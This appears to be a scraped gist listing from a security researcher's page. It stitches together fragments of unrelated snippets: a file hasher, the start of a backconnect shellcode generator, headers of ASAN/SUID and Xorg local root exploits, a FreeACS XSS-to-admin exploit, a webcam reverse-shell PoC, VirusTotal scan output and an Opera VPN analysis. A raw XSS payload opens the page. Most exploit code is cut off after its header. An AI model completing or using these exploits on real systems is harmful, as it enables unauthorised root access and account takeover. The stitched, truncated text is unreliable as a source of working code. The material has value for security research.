💭
'"/><script>alert(0)</script>

David Davidson 0x27
#!/usr/bin/python2
# coding: utf-8
# Hash a file using a few algos.
# Written for a lab.
import hashlib
import sys


def hashfile(file, algo):
    # Read the file in 64 KiB chunks so large files need not fit in memory.
    bs = 65536
    hasher = hashlib.new(algo)
    buffer = file.read(bs)
    while len(buffer) > 0:
        hasher.update(buffer)
        buffer = file.read(bs)
    return hasher.hexdigest()

#!/usr/bin/python2
# coding: utf-8
# sctp backconnect elf generator v1.0
import socket
import struct
import sys


def make_shellcode(cb_host, cb_port):
    sc = "7f454c4602010100000000000000000002003e00010000007800400000000000"
    sc += "400000000000000000000000000000000000000040003800010000000000000"

#!/bin/bash
# unsanitary.sh - ASAN/SUID Local Root Exploit
# Exploits er, unsanitized env var passing in ASAN
# which leads to file clobbering as root when executing
# setuid root binaries compiled with ASAN.
# Uses an overwrite of /etc/ld.so.preload to get root on
# a vulnerable system. Supply your own target binary to
# use for exploitation.
# Implements the bug found here: http://seclists.org/oss-sec/2016/q1/363
# Video of Exploitation: https://www.youtube.com/watch?v=jhSIm3auQMk

Preview of vtscantar (which is going to be re-integrated into hfsdown). Only alerts on the files in the tar that are flagged by VirusTotal.

hack@theplanet:~/vtscantar$ python vtscantar.py ~/hfsdown/output/mirror-118.193.176.22.tar
Scanning: /home/hack/hfsdown/output/mirror-118.193.176.22.tar
Infected File: DANDNA.apk -> SHA256sum: 72a0745d835d15a707580e3df36396fb2598d61314bb740772a36150d682ea12 -> VirusTotal: 22/55
Infected File: svchost.exe -> SHA256sum: 640525b3d664fe8ae8c861276c15dfec60f6f19db26669dcf28b13620cfced9d -> VirusTotal: 38/53
Infected File: ���22_sign.apk -> SHA256sum: 23f6e9b5e5ba85621d8b7403390825aa767ff6da28132e025844fba1e1ef47f2 -> VirusTotal: 21/54
Infected File: ���˽�_sign.apk -> SHA256sum: 37b02bbfec667862b4f6adcc0429d46e93e7a159244d6ffbf2af27d035d903f5 -> VirusTotal: 22/54
@0x27
0x27 / opera-vpn.md
Created January 19, 2017 15:49 — forked from spaze/opera-vpn.md
Opera VPN behind the curtains is just a proxy, here's how it works

When setting up (that is, immediately when the user enables it in settings), Opera VPN sends a few API requests to https://api.surfeasy.com to obtain credentials and proxy IPs, see below; also see The Oprah Proxy.

The browser then talks to a proxy, de0.opera-proxy.net (when the VPN location is set to Germany); its IP address can only be resolved from within Opera when the VPN is on, and it is 185.108.219.42 (or similar, see below). It's an HTTP/S proxy which requires auth.

When loading a page with Opera VPN enabled, the browser sends a lot of requests to de0.opera-proxy.net with Proxy-Authorization request header.

The Proxy-Authorization header decoded: CC68FE24C34B5B2414FB1DC116342EADA7D5C46B:9B9BE3FAE674A33D1820315F4CC94372926C8210B6AEC0B662EC7CAD611D86A3 (that's sha1(device_id):device_password, where device_id and device_password come from the POST /v2/register_device API call, please note that this decoded header is from another Opera installation and thus contains

@0x27
0x27 / freeacs-pwn.py
Created April 7, 2017 14:08
FreeACS Remote Takeover 0day (Persistent XSS via CWMP NOTIFY -> Add Admin User)
#!/usr/bin/python
# worlds cheapest exploit - made by copypasting from stackoverflow.
# released at BSides Edinburgh.
# Exploits freeacs - freeacs.com
# TL;DR:
# - Persistent XSS via CWMP Notify message
# - XSS fires in admin session and adds a user
# HACK THE PLANET!
# Darren Martyn - @info_dox - 7th March 2017
from BaseHTTPServer import BaseHTTPRequestHandler,HTTPServer
@0x27
0x27 / upwned247.php
Created May 5, 2017 11:44 — forked from Wack0/upwned247.php
UCam247/Phylink/Titathink/YCam/Anbash/Trivision/Netvision/others IoT webcams : remote code exec: reverse shell PoC. (works only in qemu usermode)
<?php
/*
Updated version, 2016-12-02: fixed shellcode so it *actually* works on QEMU
usermode emulation (seems I pushed an old version), and removed debug output.
-------------------------
NB: THIS PoC ONLY WORKS IN QEMU USERMODE EMULATION!
If anyone wants to fix this, go ahead (no pun intended).
However, I don't have a vulnerable product and am unwilling to acquire one.
#!/usr/bin/python2
# coding: utf-8
# implements: https://twitter.com/twisteddoodles/status/863474505808846848
# we import some random
import random
# first, we create our arrays, and pick random words from them and store.
a = random.choice(["cat", "horse", "seagull", "dolphin", "fire engine"])
b = random.choice(["escape", "make love to", "smother", "dance with"])
c = random.choice(["drumkit", "firework", "toilet", "seagull", "bag"])
d = random.choice(["disco", "airport", "changing room", "tumble dryer"])
#!/bin/bash
# x0rg - Xorg Local Root Exploit
# Released under the Snitches Get Stitches Public Licence.
# props to prdelka / fantastic for the shadow vector.
# Gr33tz to everyone in #lizardhq and elsewhere <3
# ~infodox (25/10/2018)
# FREE LAURI LOVE!
echo "x0rg"
echo "[+] First, we create our shell and library..."
cat << EOF > /tmp/libhax.c